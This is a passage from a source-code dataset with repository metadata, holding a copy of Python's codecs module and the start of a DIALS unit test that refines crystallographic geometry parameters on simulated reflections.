"MIT"
] | 1 | 2022-03-26T15:43:50.000Z | 2022-03-26T15:43:50.000Z | sets/generator/withpattern/codecs.py | ignacio-gallego/tbcnn_skill_pill | 66c3939e2944160c864b61495ac4c7aaa56acd18 | [
"MIT"
] | null | null | null | sets/generator/withpattern/codecs.py | ignacio-gallego/tbcnn_skill_pill | 66c3939e2944160c864b61495ac4c7aaa56acd18 | [
"MIT"
] | 1 | 2022-03-28T19:28:45.000Z | 2022-03-28T19:28:45.000Z | """ codecs -- Python Codec Registry, API and helpers.
Written by Marc-Andre Lemburg (mal@lemburg.com).
(c) Copyright CNRI, All Rights Reserved. NO WARRANTY.
"""
import builtins
import sys
### Registry and builtin stateless codec functions
try:
from _codecs import *
except ImportError as why:
raise SystemError('Failed to load the builtin codecs: %s' % why)
__all__ = ["register", "lookup", "open", "EncodedFile", "BOM", "BOM_BE",
"BOM_LE", "BOM32_BE", "BOM32_LE", "BOM64_BE", "BOM64_LE",
"BOM_UTF8", "BOM_UTF16", "BOM_UTF16_LE", "BOM_UTF16_BE",
"BOM_UTF32", "BOM_UTF32_LE", "BOM_UTF32_BE",
"CodecInfo", "Codec", "IncrementalEncoder", "IncrementalDecoder",
"StreamReader", "StreamWriter",
"StreamReaderWriter", "StreamRecoder",
"getencoder", "getdecoder", "getincrementalencoder",
"getincrementaldecoder", "getreader", "getwriter",
"encode", "decode", "iterencode", "iterdecode",
"strict_errors", "ignore_errors", "replace_errors",
"xmlcharrefreplace_errors",
"backslashreplace_errors", "namereplace_errors",
"register_error", "lookup_error"]
### Constants
#
# Byte Order Mark (BOM = ZERO WIDTH NO-BREAK SPACE = U+FEFF)
# and its possible byte string values
# for UTF8/UTF16/UTF32 output and little/big endian machines
#
# UTF-8
BOM_UTF8 = b'\xef\xbb\xbf'
# UTF-16, little endian
BOM_LE = BOM_UTF16_LE = b'\xff\xfe'
# UTF-16, big endian
BOM_BE = BOM_UTF16_BE = b'\xfe\xff'
# UTF-32, little endian
BOM_UTF32_LE = b'\xff\xfe\x00\x00'
# UTF-32, big endian
BOM_UTF32_BE = b'\x00\x00\xfe\xff'
if sys.byteorder == 'little':
# UTF-16, native endianness
BOM = BOM_UTF16 = BOM_UTF16_LE
# UTF-32, native endianness
BOM_UTF32 = BOM_UTF32_LE
else:
# UTF-16, native endianness
BOM = BOM_UTF16 = BOM_UTF16_BE
# UTF-32, native endianness
BOM_UTF32 = BOM_UTF32_BE
# Old broken names (don't use in new code)
BOM32_LE = BOM_UTF16_LE
BOM32_BE = BOM_UTF16_BE
BOM64_LE = BOM_UTF32_LE
BOM64_BE = BOM_UTF32_BE
### Codec base classes (defining the API)
class CodecInfo(tuple):
"""Codec details when looking up the codec registry"""
# Private API to allow Python 3.4 to denylist the known non-Unicode
# codecs in the standard library. A more general mechanism to
# reliably distinguish test encodings from other codecs will hopefully
# be defined for Python 3.5
#
# See http://bugs.python.org/issue19619
_is_text_encoding = True # Assume codecs are text encodings by default
def __new__(cls, encode, decode, streamreader=None, streamwriter=None,
incrementalencoder=None, incrementaldecoder=None, name=None,
*, _is_text_encoding=None):
self = tuple.__new__(cls, (encode, decode, streamreader, streamwriter))
self.name = name
self.encode = encode
self.decode = decode
self.incrementalencoder = incrementalencoder
self.incrementaldecoder = incrementaldecoder
self.streamwriter = streamwriter
self.streamreader = streamreader
if _is_text_encoding is not None:
self._is_text_encoding = _is_text_encoding
return self
def __repr__(self):
return "<%s.%s object for encoding %s at %#x>" % \
(self.__class__.__module__, self.__class__.__qualname__,
self.name, id(self))
class Codec:
""" Defines the interface for stateless encoders/decoders.
The .encode()/.decode() methods may use different error
handling schemes by providing the errors argument. These
string values are predefined:
'strict' - raise a ValueError error (or a subclass)
'ignore' - ignore the character and continue with the next
'replace' - replace with a suitable replacement character;
Python will use the official U+FFFD REPLACEMENT
CHARACTER for the builtin Unicode codecs on
decoding and '?' on encoding.
'surrogateescape' - replace with private code points U+DCnn.
'xmlcharrefreplace' - Replace with the appropriate XML
character reference (only for encoding).
'backslashreplace' - Replace with backslashed escape sequences.
'namereplace' - Replace with \\N{...} escape sequences
(only for encoding).
The set of allowed values can be extended via register_error.
"""
def encode(self, input, errors='strict'):
""" Encodes the object input and returns a tuple (output
object, length consumed).
errors defines the error handling to apply. It defaults to
'strict' handling.
The method may not store state in the Codec instance. Use
StreamWriter for codecs which have to keep state in order to
make encoding efficient.
The encoder must be able to handle zero length input and
return an empty object of the output object type in this
situation.
"""
raise NotImplementedError
def decode(self, input, errors='strict'):
""" Decodes the object input and returns a tuple (output
object, length consumed).
input must be an object which provides the bf_getreadbuf
buffer slot. Python strings, buffer objects and memory
mapped files are examples of objects providing this slot.
errors defines the error handling to apply. It defaults to
'strict' handling.
The method may not store state in the Codec instance. Use
StreamReader for codecs which have to keep state in order to
make decoding efficient.
The decoder must be able to handle zero length input and
return an empty object of the output object type in this
situation.
"""
raise NotImplementedError
class IncrementalEncoder(object):
"""
An IncrementalEncoder encodes an input in multiple steps. The input can
be passed piece by piece to the encode() method. The IncrementalEncoder
remembers the state of the encoding process between calls to encode().
"""
def __init__(self, errors='strict'):
"""
Creates an IncrementalEncoder instance.
The IncrementalEncoder may use different error handling schemes by
providing the errors keyword argument. See the module docstring
for a list of possible values.
"""
self.errors = errors
self.buffer = ""
def encode(self, input, final=False):
"""
Encodes input and returns the resulting object.
"""
raise NotImplementedError
def reset(self):
"""
Resets the encoder to the initial state.
"""
def getstate(self):
"""
Return the current state of the encoder.
"""
return 0
def setstate(self, state):
"""
Set the current state of the encoder. state must have been
returned by getstate().
"""
class BufferedIncrementalEncoder(IncrementalEncoder):
"""
This subclass of IncrementalEncoder can be used as the baseclass for an
incremental encoder if the encoder must keep some of the output in a
buffer between calls to encode().
"""
def __init__(self, errors='strict'):
IncrementalEncoder.__init__(self, errors)
# unencoded input that is kept between calls to encode()
self.buffer = ""
def _buffer_encode(self, input, errors, final):
# Overwrite this method in subclasses: It must encode input
# and return an (output, length consumed) tuple
raise NotImplementedError
def encode(self, input, final=False):
# encode input (taking the buffer into account)
data = self.buffer + input
(result, consumed) = self._buffer_encode(data, self.errors, final)
# keep unencoded input until the next call
self.buffer = data[consumed:]
return result
def reset(self):
IncrementalEncoder.reset(self)
self.buffer = ""
def getstate(self):
return self.buffer or 0
def setstate(self, state):
self.buffer = state or ""
class IncrementalDecoder(object):
"""
An IncrementalDecoder decodes an input in multiple steps. The input can
be passed piece by piece to the decode() method. The IncrementalDecoder
remembers the state of the decoding process between calls to decode().
"""
def __init__(self, errors='strict'):
"""
Create an IncrementalDecoder instance.
The IncrementalDecoder may use different error handling schemes by
providing the errors keyword argument. See the module docstring
for a list of possible values.
"""
self.errors = errors
def decode(self, input, final=False):
"""
Decode input and returns the resulting object.
"""
raise NotImplementedError
def reset(self):
"""
Reset the decoder to the initial state.
"""
def getstate(self):
"""
Return the current state of the decoder.
This must be a (buffered_input, additional_state_info) tuple.
buffered_input must be a bytes object containing bytes that
were passed to decode() that have not yet been converted.
additional_state_info must be a non-negative integer
representing the state of the decoder WITHOUT yet having
processed the contents of buffered_input. In the initial state
and after reset(), getstate() must return (b"", 0).
"""
return (b"", 0)
def setstate(self, state):
"""
Set the current state of the decoder.
state must have been returned by getstate(). The effect of
setstate((b"", 0)) must be equivalent to reset().
"""
class BufferedIncrementalDecoder(IncrementalDecoder):
"""
This subclass of IncrementalDecoder can be used as the baseclass for an
incremental decoder if the decoder must be able to handle incomplete
byte sequences.
"""
def __init__(self, errors='strict'):
IncrementalDecoder.__init__(self, errors)
# undecoded input that is kept between calls to decode()
self.buffer = b""
def _buffer_decode(self, input, errors, final):
# Overwrite this method in subclasses: It must decode input
# and return an (output, length consumed) tuple
raise NotImplementedError
def decode(self, input, final=False):
# decode input (taking the buffer into account)
data = self.buffer + input
(result, consumed) = self._buffer_decode(data, self.errors, final)
# keep undecoded input until the next call
self.buffer = data[consumed:]
return result
def reset(self):
IncrementalDecoder.reset(self)
self.buffer = b""
def getstate(self):
# additional state info is always 0
return (self.buffer, 0)
def setstate(self, state):
# ignore additional state info
self.buffer = state[0]
#
# The StreamWriter and StreamReader class provide generic working
# interfaces which can be used to implement new encoding submodules
# very easily. See encodings/utf_8.py for an example on how this is
# done.
#
class StreamWriter(Codec):
def __init__(self, stream, errors='strict'):
""" Creates a StreamWriter instance.
stream must be a file-like object open for writing.
The StreamWriter may use different error handling
schemes by providing the errors keyword argument. These
parameters are predefined:
'strict' - raise a ValueError (or a subclass)
'ignore' - ignore the character and continue with the next
'replace'- replace with a suitable replacement character
'xmlcharrefreplace' - Replace with the appropriate XML
character reference.
'backslashreplace' - Replace with backslashed escape
sequences.
'namereplace' - Replace with \\N{...} escape sequences.
The set of allowed parameter values can be extended via
register_error.
"""
self.stream = stream
self.errors = errors
def write(self, object):
""" Writes the object's contents encoded to self.stream.
"""
data, consumed = self.encode(object, self.errors)
self.stream.write(data)
def writelines(self, list):
""" Writes the concatenated list of strings to the stream
using .write().
"""
self.write(''.join(list))
def reset(self):
""" Resets the codec buffers used for keeping internal state.
Calling this method should ensure that the data on the
output is put into a clean state, that allows appending
of new fresh data without having to rescan the whole
stream to recover state.
"""
pass
def seek(self, offset, whence=0):
self.stream.seek(offset, whence)
if whence == 0 and offset == 0:
self.reset()
def __getattr__(self, name,
getattr=getattr):
""" Inherit all other methods from the underlying stream.
"""
return getattr(self.stream, name)
def __enter__(self):
return self
def __exit__(self, type, value, tb):
self.stream.close()
###
class StreamReader(Codec):
charbuffertype = str
def __init__(self, stream, errors='strict'):
""" Creates a StreamReader instance.
stream must be a file-like object open for reading.
The StreamReader may use different error handling
schemes by providing the errors keyword argument. These
parameters are predefined:
'strict' - raise a ValueError (or a subclass)
'ignore' - ignore the character and continue with the next
'replace'- replace with a suitable replacement character
'backslashreplace' - Replace with backslashed escape sequences;
The set of allowed parameter values can be extended via
register_error.
"""
self.stream = stream
self.errors = errors
self.bytebuffer = b""
self._empty_charbuffer = self.charbuffertype()
self.charbuffer = self._empty_charbuffer
self.linebuffer = None
def decode(self, input, errors='strict'):
raise NotImplementedError
def read(self, size=-1, chars=-1, firstline=False):
""" Decodes data from the stream self.stream and returns the
resulting object.
chars indicates the number of decoded code points or bytes to
return. read() will never return more data than requested,
but it might return less, if there is not enough available.
size indicates the approximate maximum number of decoded
bytes or code points to read for decoding. The decoder
can modify this setting as appropriate. The default value
-1 indicates to read and decode as much as possible. size
is intended to prevent having to decode huge files in one
step.
If firstline is true, and a UnicodeDecodeError happens
after the first line terminator in the input only the first line
will be returned, the rest of the input will be kept until the
next call to read().
The method should use a greedy read strategy, meaning that
it should read as much data as is allowed within the
definition of the encoding and the given size, e.g. if
optional encoding endings or state markers are available
on the stream, these should be read too.
"""
# If we have lines cached, first merge them back into characters
if self.linebuffer:
self.charbuffer = self._empty_charbuffer.join(self.linebuffer)
self.linebuffer = None
if chars < 0:
# For compatibility with other read() methods that take a
# single argument
chars = size
# read until we get the required number of characters (if available)
while True:
# can the request be satisfied from the character buffer?
if chars >= 0:
if len(self.charbuffer) >= chars:
break
# we need more data
if size < 0:
newdata = self.stream.read()
else:
newdata = self.stream.read(size)
# decode bytes (those remaining from the last call included)
data = self.bytebuffer + newdata
if not data:
break
try:
newchars, decodedbytes = self.decode(data, self.errors)
except UnicodeDecodeError as exc:
if firstline:
newchars, decodedbytes = \
self.decode(data[:exc.start], self.errors)
lines = newchars.splitlines(keepends=True)
if len(lines)<=1:
raise
else:
raise
# keep undecoded bytes until the next call
self.bytebuffer = data[decodedbytes:]
# put new characters in the character buffer
self.charbuffer += newchars
# there was no data available
if not newdata:
break
if chars < 0:
# Return everything we've got
result = self.charbuffer
self.charbuffer = self._empty_charbuffer
else:
# Return the first chars characters
result = self.charbuffer[:chars]
self.charbuffer = self.charbuffer[chars:]
return result
def readline(self, size=None, keepends=True):
""" Read one line from the input stream and return the
decoded data.
size, if given, is passed as size argument to the
read() method.
"""
# If we have lines cached from an earlier read, return
# them unconditionally
if self.linebuffer:
line = self.linebuffer[0]
del self.linebuffer[0]
if len(self.linebuffer) == 1:
# revert to charbuffer mode; we might need more data
# next time
self.charbuffer = self.linebuffer[0]
self.linebuffer = None
if not keepends:
line = line.splitlines(keepends=False)[0]
return line
readsize = size or 72
line = self._empty_charbuffer
# If size is given, we call read() only once
while True:
data = self.read(readsize, firstline=True)
if data:
# If we're at a "\r" read one extra character (which might
# be a "\n") to get a proper line ending. If the stream is
# temporarily exhausted we return the wrong line ending.
if (isinstance(data, str) and data.endswith("\r")) or \
(isinstance(data, bytes) and data.endswith(b"\r")):
data += self.read(size=1, chars=1)
line += data
lines = line.splitlines(keepends=True)
if lines:
if len(lines) > 1:
# More than one line result; the first line is a full line
# to return
line = lines[0]
del lines[0]
if len(lines) > 1:
# cache the remaining lines
lines[-1] += self.charbuffer
self.linebuffer = lines
self.charbuffer = None
else:
# only one remaining line, put it back into charbuffer
self.charbuffer = lines[0] + self.charbuffer
if not keepends:
line = line.splitlines(keepends=False)[0]
break
line0withend = lines[0]
line0withoutend = lines[0].splitlines(keepends=False)[0]
if line0withend != line0withoutend: # We really have a line end
# Put the rest back together and keep it until the next call
self.charbuffer = self._empty_charbuffer.join(lines[1:]) + \
self.charbuffer
if keepends:
line = line0withend
else:
line = line0withoutend
break
# we didn't get anything or this was our only try
if not data or size is not None:
if line and not keepends:
line = line.splitlines(keepends=False)[0]
break
if readsize < 8000:
readsize *= 2
return line
def readlines(self, sizehint=None, keepends=True):
""" Read all lines available on the input stream
and return them as a list.
Line breaks are implemented using the codec's decoder
method and are included in the list entries.
sizehint, if given, is ignored since there is no efficient
way to finding the true end-of-line.
"""
data = self.read()
return data.splitlines(keepends)
def reset(self):
""" Resets the codec buffers used for keeping internal state.
Note that no stream repositioning should take place.
This method is primarily intended to be able to recover
from decoding errors.
"""
self.bytebuffer = b""
self.charbuffer = self._empty_charbuffer
self.linebuffer = None
def seek(self, offset, whence=0):
""" Set the input stream's current position.
Resets the codec buffers used for keeping state.
"""
self.stream.seek(offset, whence)
self.reset()
def __next__(self):
""" Return the next decoded line from the input stream."""
line = self.readline()
if line:
return line
raise StopIteration
def __iter__(self):
return self
def __getattr__(self, name,
getattr=getattr):
""" Inherit all other methods from the underlying stream.
"""
return getattr(self.stream, name)
def __enter__(self):
return self
def __exit__(self, type, value, tb):
self.stream.close()
###
class StreamReaderWriter:
""" StreamReaderWriter instances allow wrapping streams which
work in both read and write modes.
The design is such that one can use the factory functions
returned by the codec.lookup() function to construct the
instance.
"""
# Optional attributes set by the file wrappers below
encoding = 'unknown'
def __init__(self, stream, Reader, Writer, errors='strict'):
""" Creates a StreamReaderWriter instance.
stream must be a Stream-like object.
Reader, Writer must be factory functions or classes
providing the StreamReader, StreamWriter interface resp.
Error handling is done in the same way as defined for the
StreamWriter/Readers.
"""
self.stream = stream
self.reader = Reader(stream, errors)
self.writer = Writer(stream, errors)
self.errors = errors
def read(self, size=-1):
return self.reader.read(size)
def readline(self, size=None):
return self.reader.readline(size)
def readlines(self, sizehint=None):
return self.reader.readlines(sizehint)
def __next__(self):
""" Return the next decoded line from the input stream."""
return next(self.reader)
def __iter__(self):
return self
def write(self, data):
return self.writer.write(data)
def writelines(self, list):
return self.writer.writelines(list)
def reset(self):
self.reader.reset()
self.writer.reset()
def seek(self, offset, whence=0):
self.stream.seek(offset, whence)
self.reader.reset()
if whence == 0 and offset == 0:
self.writer.reset()
def __getattr__(self, name,
getattr=getattr):
""" Inherit all other methods from the underlying stream.
"""
return getattr(self.stream, name)
# these are needed to make "with StreamReaderWriter(...)" work properly
def __enter__(self):
return self
def __exit__(self, type, value, tb):
self.stream.close()
###
class StreamRecoder:
""" StreamRecoder instances translate data from one encoding to another.
They use the complete set of APIs returned by the
codecs.lookup() function to implement their task.
Data written to the StreamRecoder is first decoded into an
intermediate format (depending on the "decode" codec) and then
written to the underlying stream using an instance of the provided
Writer class.
In the other direction, data is read from the underlying stream using
a Reader instance and then encoded and returned to the caller.
"""
# Optional attributes set by the file wrappers below
data_encoding = 'unknown'
file_encoding = 'unknown'
def __init__(self, stream, encode, decode, Reader, Writer,
errors='strict'):
""" Creates a StreamRecoder instance which implements a two-way
conversion: encode and decode work on the frontend (the
data visible to .read() and .write()) while Reader and Writer
work on the backend (the data in stream).
You can use these objects to do transparent
transcodings from e.g. latin-1 to utf-8 and back.
stream must be a file-like object.
encode and decode must adhere to the Codec interface; Reader and
Writer must be factory functions or classes providing the
StreamReader and StreamWriter interfaces resp.
Error handling is done in the same way as defined for the
StreamWriter/Readers.
"""
self.stream = stream
self.encode = encode
self.decode = decode
self.reader = Reader(stream, errors)
self.writer = Writer(stream, errors)
self.errors = errors
def read(self, size=-1):
data = self.reader.read(size)
data, bytesencoded = self.encode(data, self.errors)
return data
def readline(self, size=None):
if size is None:
data = self.reader.readline()
else:
data = self.reader.readline(size)
data, bytesencoded = self.encode(data, self.errors)
return data
def readlines(self, sizehint=None):
data = self.reader.read()
data, bytesencoded = self.encode(data, self.errors)
return data.splitlines(keepends=True)
def __next__(self):
""" Return the next decoded line from the input stream."""
data = next(self.reader)
data, bytesencoded = self.encode(data, self.errors)
return data
def __iter__(self):
return self
def write(self, data):
data, bytesdecoded = self.decode(data, self.errors)
return self.writer.write(data)
def writelines(self, list):
data = b''.join(list)
data, bytesdecoded = self.decode(data, self.errors)
return self.writer.write(data)
def reset(self):
self.reader.reset()
self.writer.reset()
def seek(self, offset, whence=0):
# Seeks must be propagated to both the readers and writers
# as they might need to reset their internal buffers.
self.reader.seek(offset, whence)
self.writer.seek(offset, whence)
def __getattr__(self, name,
getattr=getattr):
""" Inherit all other methods from the underlying stream.
"""
return getattr(self.stream, name)
def __enter__(self):
return self
def __exit__(self, type, value, tb):
self.stream.close()
### Shortcuts
def open(filename, mode='r', encoding=None, errors='strict', buffering=-1):
""" Open an encoded file using the given mode and return
a wrapped version providing transparent encoding/decoding.
Note: The wrapped version will only accept the object format
defined by the codecs, i.e. Unicode objects for most builtin
codecs. Output is also codec dependent and will usually be
Unicode as well.
Underlying encoded files are always opened in binary mode.
The default file mode is 'r', meaning to open the file in read mode.
encoding specifies the encoding which is to be used for the
file.
errors may be given to define the error handling. It defaults
to 'strict' which causes ValueErrors to be raised in case an
encoding error occurs.
buffering has the same meaning as for the builtin open() API.
It defaults to -1 which means that the default buffer size will
be used.
The returned wrapped file object provides an extra attribute
.encoding which allows querying the used encoding. This
attribute is only available if an encoding was specified as
parameter.
"""
if encoding is not None and \
'b' not in mode:
# Force opening of the file in binary mode
mode = mode + 'b'
file = builtins.open(filename, mode, buffering)
if encoding is None:
return file
try:
info = lookup(encoding)
srw = StreamReaderWriter(file, info.streamreader, info.streamwriter, errors)
# Add attributes to simplify introspection
srw.encoding = encoding
return srw
except:
file.close()
raise
def EncodedFile(file, data_encoding, file_encoding=None, errors='strict'):
""" Return a wrapped version of file which provides transparent
encoding translation.
Data written to the wrapped file is decoded according
to the given data_encoding and then encoded to the underlying
file using file_encoding. The intermediate data type
will usually be Unicode but depends on the specified codecs.
Bytes read from the file are decoded using file_encoding and then
passed back to the caller encoded using data_encoding.
If file_encoding is not given, it defaults to data_encoding.
errors may be given to define the error handling. It defaults
to 'strict' which causes ValueErrors to be raised in case an
encoding error occurs.
The returned wrapped file object provides two extra attributes
.data_encoding and .file_encoding which reflect the given
parameters of the same name. The attributes can be used for
introspection by Python programs.
"""
if file_encoding is None:
file_encoding = data_encoding
data_info = lookup(data_encoding)
file_info = lookup(file_encoding)
sr = StreamRecoder(file, data_info.encode, data_info.decode,
file_info.streamreader, file_info.streamwriter, errors)
# Add attributes to simplify introspection
sr.data_encoding = data_encoding
sr.file_encoding = file_encoding
return sr
### Helpers for codec lookup
def getencoder(encoding):
""" Lookup up the codec for the given encoding and return
its encoder function.
Raises a LookupError in case the encoding cannot be found.
"""
return lookup(encoding).encode
def getdecoder(encoding):
""" Lookup up the codec for the given encoding and return
its decoder function.
Raises a LookupError in case the encoding cannot be found.
"""
return lookup(encoding).decode
def getincrementalencoder(encoding):
""" Lookup up the codec for the given encoding and return
its IncrementalEncoder class or factory function.
Raises a LookupError in case the encoding cannot be found
or the codecs doesn't provide an incremental encoder.
"""
encoder = lookup(encoding).incrementalencoder
if encoder is None:
raise LookupError(encoding)
return encoder
def getincrementaldecoder(encoding):
""" Lookup up the codec for the given encoding and return
its IncrementalDecoder class or factory function.
Raises a LookupError in case the encoding cannot be found
or the codecs doesn't provide an incremental decoder.
"""
decoder = lookup(encoding).incrementaldecoder
if decoder is None:
raise LookupError(encoding)
return decoder
def getreader(encoding):
""" Lookup up the codec for the given encoding and return
its StreamReader class or factory function.
Raises a LookupError in case the encoding cannot be found.
"""
return lookup(encoding).streamreader
def getwriter(encoding):
""" Lookup up the codec for the given encoding and return
its StreamWriter class or factory function.
Raises a LookupError in case the encoding cannot be found.
"""
return lookup(encoding).streamwriter
def iterencode(iterator, encoding, errors='strict', **kwargs):
"""
Encoding iterator.
Encodes the input strings from the iterator using an IncrementalEncoder.
errors and kwargs are passed through to the IncrementalEncoder
constructor.
"""
encoder = getincrementalencoder(encoding)(errors, **kwargs)
for input in iterator:
output = encoder.encode(input)
if output:
yield output
output = encoder.encode("", True)
if output:
yield output
def iterdecode(iterator, encoding, errors='strict', **kwargs):
"""
Decoding iterator.
Decodes the input strings from the iterator using an IncrementalDecoder.
errors and kwargs are passed through to the IncrementalDecoder
constructor.
"""
decoder = getincrementaldecoder(encoding)(errors, **kwargs)
for input in iterator:
output = decoder.decode(input)
if output:
yield output
output = decoder.decode(b"", True)
if output:
yield output
### Helpers for charmap-based codecs
def make_identity_dict(rng):
""" make_identity_dict(rng) -> dict
Return a dictionary where elements of the rng sequence are
mapped to themselves.
"""
return {i:i for i in rng}
def make_encoding_map(decoding_map):
""" Creates an encoding map from a decoding map.
If a target mapping in the decoding map occurs multiple
times, then that target is mapped to None (undefined mapping),
causing an exception when encountered by the charmap codec
during translation.
One example where this happens is cp875.py which decodes
multiple character to \\u001a.
"""
m = {}
for k,v in decoding_map.items():
if not v in m:
m[v] = k
else:
m[v] = None
return m
### error handlers
try:
strict_errors = lookup_error("strict")
ignore_errors = lookup_error("ignore")
replace_errors = lookup_error("replace")
xmlcharrefreplace_errors = lookup_error("xmlcharrefreplace")
backslashreplace_errors = lookup_error("backslashreplace")
namereplace_errors = lookup_error("namereplace")
except LookupError:
# In --disable-unicode builds, these error handler are missing
strict_errors = None
ignore_errors = None
replace_errors = None
xmlcharrefreplace_errors = None
backslashreplace_errors = None
namereplace_errors = None
# Tell modulefinder that using codecs probably needs the encodings
# package
_false = 0
if _false:
import encodings
### Tests
if __name__ == '__main__':
# Make stdout translate Latin-1 output into UTF-8 output
sys.stdout = EncodedFile(sys.stdout, 'latin-1', 'utf-8')
# Have stdin translate Latin-1 input into UTF-8 input
sys.stdin = EncodedFile(sys.stdin, 'utf-8', 'latin-1')
| 33.538598 | 85 | 0.604847 |
795c769755c3d79fffcb5270907a526a34c39f00 | 9,477 | py | Python | test/algorithms/refinement/test_orientation_refinement.py | TiankunZhou/dials | bd5c95b73c442cceb1c61b1690fd4562acf4e337 | [
"BSD-3-Clause"
] | 2 | 2021-03-17T11:25:46.000Z | 2021-11-18T04:20:54.000Z | test/algorithms/refinement/test_orientation_refinement.py | TiankunZhou/dials | bd5c95b73c442cceb1c61b1690fd4562acf4e337 | [
"BSD-3-Clause"
] | null | null | null | test/algorithms/refinement/test_orientation_refinement.py | TiankunZhou/dials | bd5c95b73c442cceb1c61b1690fd4562acf4e337 | [
"BSD-3-Clause"
] | null | null | null | """
Test refinement of beam, detector and crystal orientation parameters
using generated reflection positions from ideal geometry.
Control of the experimental model and choice of minimiser is done via
PHIL, which means we can do, for example:
cctbx.python tst_orientation_refinement.py \
"random_seed=3; engine=LBFGScurvs"
"""
from __future__ import absolute_import, division, print_function
import sys
def test(args=[]):
from math import pi
from cctbx.sgtbx import space_group, space_group_symbols
# Symmetry constrained parameterisation for the unit cell
from cctbx.uctbx import unit_cell
# We will set up a mock scan and a mock experiment list
from dxtbx.model import ScanFactory
from dxtbx.model.experiment_list import Experiment, ExperimentList
from libtbx.phil import parse
from libtbx.test_utils import approx_equal
from rstbx.symmetry.constraints.parameter_reduction import symmetrize_reduce_enlarge
from scitbx import matrix
from scitbx.array_family import flex
# Get modules to build models and minimiser using PHIL
import dials.test.algorithms.refinement.setup_geometry as setup_geometry
import dials.test.algorithms.refinement.setup_minimiser as setup_minimiser
from dials.algorithms.refinement.parameterisation.beam_parameters import (
BeamParameterisation,
)
from dials.algorithms.refinement.parameterisation.crystal_parameters import (
CrystalOrientationParameterisation,
CrystalUnitCellParameterisation,
)
# Model parameterisations
from dials.algorithms.refinement.parameterisation.detector_parameters import (
DetectorParameterisationSinglePanel,
)
# Parameterisation of the prediction equation
from dials.algorithms.refinement.parameterisation.prediction_parameters import (
XYPhiPredictionParameterisation,
)
from dials.algorithms.refinement.prediction.managed_predictors import (
ScansExperimentsPredictor,
ScansRayPredictor,
)
from dials.algorithms.refinement.reflection_manager import ReflectionManager
# Imports for the target function
from dials.algorithms.refinement.target import (
LeastSquaresPositionalResidualWithRmsdCutoff,
)
# Reflection prediction
from dials.algorithms.spot_prediction import IndexGenerator, ray_intersection
#############################
# Setup experimental models #
#############################
master_phil = parse(
"""
include scope dials.test.algorithms.refinement.geometry_phil
include scope dials.test.algorithms.refinement.minimiser_phil
""",
process_includes=True,
)
models = setup_geometry.Extract(master_phil, cmdline_args=args)
mydetector = models.detector
mygonio = models.goniometer
mycrystal = models.crystal
mybeam = models.beam
# Build a mock scan for a 180 degree sequence
sf = ScanFactory()
myscan = sf.make_scan(
image_range=(1, 1800),
exposure_times=0.1,
oscillation=(0, 0.1),
epochs=list(range(1800)),
deg=True,
)
sequence_range = myscan.get_oscillation_range(deg=False)
im_width = myscan.get_oscillation(deg=False)[1]
assert sequence_range == (0.0, pi)
assert approx_equal(im_width, 0.1 * pi / 180.0)
# Build an experiment list
experiments = ExperimentList()
experiments.append(
Experiment(
beam=mybeam,
detector=mydetector,
goniometer=mygonio,
scan=myscan,
crystal=mycrystal,
imageset=None,
)
)
###########################
# Parameterise the models #
###########################
det_param = DetectorParameterisationSinglePanel(mydetector)
s0_param = BeamParameterisation(mybeam, mygonio)
xlo_param = CrystalOrientationParameterisation(mycrystal)
xluc_param = CrystalUnitCellParameterisation(mycrystal)
# Fix beam to the X-Z plane (imgCIF geometry), fix wavelength
s0_param.set_fixed([True, False, True])
# Fix crystal parameters
# xluc_param.set_fixed([True, True, True, True, True, True])
########################################################################
# Link model parameterisations together into a parameterisation of the #
# prediction equation #
########################################################################
pred_param = XYPhiPredictionParameterisation(
experiments, [det_param], [s0_param], [xlo_param], [xluc_param]
)
################################
# Apply known parameter shifts #
################################
# shift detector by 1.0 mm each translation and 2 mrad each rotation
det_p_vals = det_param.get_param_vals()
p_vals = [a + b for a, b in zip(det_p_vals, [1.0, 1.0, 1.0, 2.0, 2.0, 2.0])]
det_param.set_param_vals(p_vals)
# shift beam by 2 mrad in free axis
s0_p_vals = s0_param.get_param_vals()
p_vals = list(s0_p_vals)
p_vals[0] += 2.0
s0_param.set_param_vals(p_vals)
# rotate crystal a bit (=2 mrad each rotation)
xlo_p_vals = xlo_param.get_param_vals()
p_vals = [a + b for a, b in zip(xlo_p_vals, [2.0, 2.0, 2.0])]
xlo_param.set_param_vals(p_vals)
# change unit cell a bit (=0.1 Angstrom length upsets, 0.1 degree of
# gamma angle)
xluc_p_vals = xluc_param.get_param_vals()
cell_params = mycrystal.get_unit_cell().parameters()
cell_params = [a + b for a, b in zip(cell_params, [0.1, 0.1, 0.1, 0.0, 0.0, 0.1])]
new_uc = unit_cell(cell_params)
newB = matrix.sqr(new_uc.fractionalization_matrix()).transpose()
S = symmetrize_reduce_enlarge(mycrystal.get_space_group())
S.set_orientation(orientation=newB)
X = tuple([e * 1.0e5 for e in S.forward_independent_parameters()])
xluc_param.set_param_vals(X)
#############################
# Generate some reflections #
#############################
print("Reflections will be generated with the following geometry:")
print(mybeam)
print(mydetector)
print(mycrystal)
print("Target values of parameters are")
msg = "Parameters: " + "%.5f " * len(pred_param)
print(msg % tuple(pred_param.get_param_vals()))
print()
# All indices in a 2.0 Angstrom sphere
resolution = 2.0
index_generator = IndexGenerator(
mycrystal.get_unit_cell(),
space_group(space_group_symbols(1).hall()).type(),
resolution,
)
indices = index_generator.to_array()
# Predict rays within the sequence range
ray_predictor = ScansRayPredictor(experiments, sequence_range)
obs_refs = ray_predictor(indices)
print("Total number of reflections excited", len(obs_refs))
# Take only those rays that intersect the detector
intersects = ray_intersection(mydetector, obs_refs)
obs_refs = obs_refs.select(intersects)
# Make a reflection predictor and re-predict for all these reflections. The
# result is the same, but we gain also the flags and xyzcal.px columns
ref_predictor = ScansExperimentsPredictor(experiments)
obs_refs["id"] = flex.int(len(obs_refs), 0)
obs_refs = ref_predictor(obs_refs)
# Set 'observed' centroids from the predicted ones
obs_refs["xyzobs.mm.value"] = obs_refs["xyzcal.mm"]
# Invent some variances for the centroid positions of the simulated data
im_width = 0.1 * pi / 180.0
px_size = mydetector[0].get_pixel_size()
var_x = flex.double(len(obs_refs), (px_size[0] / 2.0) ** 2)
var_y = flex.double(len(obs_refs), (px_size[1] / 2.0) ** 2)
var_phi = flex.double(len(obs_refs), (im_width / 2.0) ** 2)
obs_refs["xyzobs.mm.variance"] = flex.vec3_double(var_x, var_y, var_phi)
print("Total number of observations made", len(obs_refs))
###############################
# Undo known parameter shifts #
###############################
s0_param.set_param_vals(s0_p_vals)
det_param.set_param_vals(det_p_vals)
xlo_param.set_param_vals(xlo_p_vals)
xluc_param.set_param_vals(xluc_p_vals)
